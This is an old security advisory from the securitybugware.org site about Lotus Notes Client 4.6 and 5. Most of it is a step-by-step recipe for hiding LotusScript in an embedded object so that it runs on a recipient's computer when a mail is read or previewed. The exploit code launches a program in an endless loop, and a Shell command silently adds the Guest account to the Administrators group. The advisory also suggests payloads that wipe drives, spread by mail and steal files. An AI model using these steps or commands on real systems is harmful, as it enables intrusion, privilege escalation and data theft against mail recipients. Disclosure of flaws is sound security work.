----[www.securitybugware.org]---- < A D V I S O R I E S > Dear World, From 1996 to 9th Sep 2001, Hrvoje Crvelin maintained the most explicit website about bugs, exploits, and solutions. He decided to stop this project. As there is no such resource on the web, we decided to keep this one alive. Behind the new Security BugWare you can find a french organisation (association loi 1901), which is a non-profit organisation. Our aim is to continue Hrvoje job, for all people like us who need to have a centralised - and straight to the point - bug information page. For the better propaganda of this news, we offer you an exclusive "Trick of the Trade" : Whacking A Machine With Lotus Notes Mail COMMAND Lotus Notes Client SYSTEMS AFFECTED Lotus Notes Client 5 All releases Lotus Notes Client 4.6 All releases PROBLEM SecurityBugware team found following, as posted on www.securitybugware.org : With a little LotusScript in your mail, you can execute all what you want on the recipient's computer - even out of Notes. Follow these steps : 1) Create a new mail, add recepients 2) Go to the body and click in the menu "Create..Object" 3) Select "Control" and any object you please such as "ActiveXPlugin Object" 4) In Client 4.6 right click on the object to get "Properties" In Client 5 click on the menu the new "Applet" feature, and go to "Properties" then check "run the object when the document is read" 5) Then select "Edit events" : An event pane opens linked to the object 6) In the "Initialize" section Add the following code, where "My EMAIL" is your Lotus Notes account name (if you get this part wrong, you'll bomb yourself) : Sub Initialize Dim TaskId As Integer Dim session As New NotesSession If session.CommonUserName<>"My EMAIL" Then Do TaskId%=Shell("CALC.EXE",1) Loop End If End Subv 7) In the "Terminate" section, do the same : Sub Terminate Dim TaskId As Integer Dim session As New NotesSession If session.CommonUserName<>"My EMAIL" Then Do TaskId%=Shell("CALC.EXE",1) Loop End If End Subv 8) Click again on the "Initialize" section 9) Hit the "Send" button, enjoy ;-) Your ActiveX (or other object you choosed) gets executed during the reading of the document. If the victim "previews" his mails without opening them... no problem, he will die anyway because a previsualisation is a reading. In this example we just run the calculator in loop, but there can be infinite possibilities like formating hard drives, sending emails, replicating the script to send it to the whole adressbook, sending files, stoling files from the victim hard drives without his notice etc... For instance you could replace the Do .. Loop by : TaskId%=Shell("CMD.EXE /C net localgroup " \"Administrators"\" /add guest ",1) which adds silentely account Guest to Administrative group In a few words, Lotus Intranet is a giant backdoor in itself. After some checks, it seems the smtp gateway don't let LotusScript pass through. You can only play inside your Notes interconnected domains. SOLUTION The only solution is to desactivate the preview, and to delete the memo before reading it. -- Security Bugware Team Irib, Jitsu, Kiwi www.securitybugware.org